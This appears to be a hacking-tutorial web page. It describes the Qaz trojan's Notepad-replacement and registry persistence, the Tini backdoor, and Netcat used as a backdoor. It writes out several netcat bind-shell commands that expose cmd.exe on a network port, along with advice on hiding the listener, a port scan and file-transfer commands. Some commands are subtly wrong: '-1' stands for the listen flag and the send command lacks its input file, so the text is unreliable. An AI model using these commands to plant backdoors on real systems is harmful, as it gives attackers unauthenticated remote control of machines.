| Tools |
W32.HLLW.Qaz.A was first discovered in China in July 2000.
This Trojan gained more media coverage for its hack on Microsoft. The means of
its spread was a much debated topic, as it was found on several computers on
Microsoft's LAN. Much speculation surrounded the possibility of a hacker probing
a system during a download and injecting the
Trojan.
|
It is a companion virus that can spread over the network. It also
has a "backdoor" that will enable a remote user to connect to and control the
computer using port 7597. Because the virus cannot spread to computers outside
of the network, it may have originally been sent out by email.
W32.HLLW.Qaz.A was originally known as Qaz Trojan. It was renamed
to W32.HLLW.Qaz.A on August 10, 2000. There exist variants to this companion
virus. When W32.HLLW.Qaz.A is launched, it searches for and renames Notepad.exe
to Note.com. W32.HLLW.Qaz.A then copies itself to the computer as Notepad.exe.
Each time Notepad.exe is executed, it runs the virus code and the original
Notepad, which is renamed to Note.com, to avoid being noticed. The virus adds
the following string value:
startIE "notepad qazwsx.hsq" to the following registry key:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
W32.HLLW.Qaz.A enumerates through the network neighborhood and
attempt to find a computer to infect. When it finds a computer, it infects it by
searching for Notepad.exe and making the same modifications as previously
described. It does not require any mapped drives to infect other computers. Once
the computer is infected, its IP address is emailed to a remote user. The
backdoor payload in the virus uses WinSock and awaits connection. This enables a
hacker to connect to and gain access to the infected computer.
| Tools |
Tini is a simple and very small (3kb) backdoor for Windows,
coded in assembler by Arne Vidstrom. It listens at TCP port 7777 and gives
anybody who connects a remote Command Prompt.
|
The reason why this application has been discussed here is that
this application creates the possibility of remotely controlling a machine
without any validation or authentication mechanisms. Though the author does not
consider this a Trojan, its application in creating a backdoor was seen during
the gator exploit. The Gator installer Plug-in allowed any software to be
installed.
The vulnerability existed in a plug-in which installed the actual
software. This plug-in was scriptable and an HTML page could be used to specify
the location of the Gator installation. The installation file downloaded is
checked for the filename. If the filename was setup.exe, it was then
decompressed and executed. If the file was not compressed it would still be
executed. Using this method, a malicious user could easily create an HTML page
which makes use of the rogue ActiveX component to point at a Trojan file.
This Trojan demonstrates how a backdoor can be used to remotely
access the system at a later time. A backdoor's goal is to remove the evidence
of initial entry from the systems log. An effective backdoor will allow the
attacker to retain access to a machine it has penetrated even if the intrusion
factor has in the meantime been detected by the system administrator. Resetting
passwords, changing disk access permissions or fixing original security holes in
the hope of remedying the problem may not be a proper solution at all times.
| Tools |
The original version of Netcat was written by hobbit and the
NT version was done by Weld Pond.
|
Using netcat, the attacker can set up a port or a back door that
will allow him to telnet into a DOS shell. With a simple command such as C:
\>nc -L -p 5000 -t -e cmd.exe, the attacker can bind port 5000. This is
detailed later. Let us first take a look at some of the features that netcat
provides.
With netcat, the user can create outbound or inbound connections,
TCP or UDP, to or from any port. It provides for full DNS forward/reverse
checking, with appropriate warnings. Additionally, it gives the ability to use
any local source port, any locally-configured network source address and comes
with built-in port-scanning capabilities. It has a built-in loose source-routing
capability and can read command line arguments from standard input. Another
feature is the ability to let another program service inbound connections.
Given these features, some of the applications of netcat can be
enumerated as an enabling script backend, port scanner and enumerator, used as
backup handlers and for file transfers, firewall testing, proxy gatewaying,
simulating servers, testing network performance and testing address spoofing. It
is not without reason that this is called a network Swiss army knife.
Let us take a closer look at the command. On a Windows server when
the following command is issued (i.e. from the directory that contains
netcat)
nc -1 -p4444 -d -e cmd.exe -L
The -1 puts netcat into a listening mode, the -p4444 tells netcat
to use port 4444, the -d allows netcat to run detached from the console, the -e
cmd.exe tells netcat to execute the cmd.exe program when the connection is
established, and the -L will restart Netcat with the same command line when the
connection is terminated.
On the client system the following command
C:\>nc -v [ip address of target] 4444
causes netcat to connect to the server whose IP is specified on
port 4444. The user is then given a console connection to the destination
server. Netcat can also make an outbound connection and then run a program or
script on the originating end, with input and output connected to the same
network port.
On the target system, the attacker can choose to rename the
executable or recompile it with a different name. To remain hidden he can choose
to detach from the console option (-d) or use a port that is well known and
allowed through any firewalls between the two systems. This will not arouse
suspicions till later on.
A scanning example from Hobbit is "nc -v -w 2 -z target 20–30".
Netcat will try connecting to every port between 20 and 30 [inclusive] at the
target, and inform about an FTP server, telnet server, and mailer it has come
across in the range. The -z switch prevents sending any data to a TCP connection
and very limited probe data to a UDP connection. This makes it useful as a fast
scanner to see what ports the target is listening on. To limit scanning speed if
desired, -i will insert a delay between each port probe.
To receive a file named targetfile on the target system start
netcat with the following command:
nc -1 -p 4444 >targetfile
To send a file named myfile to the target system from the source
system use the following command:
nc target 4444
Issue a Ctrl+C on the source system and the session is over.
For more information continue read on : www.oceninfo.co.cc being with us and be a master of computer
COMMENTS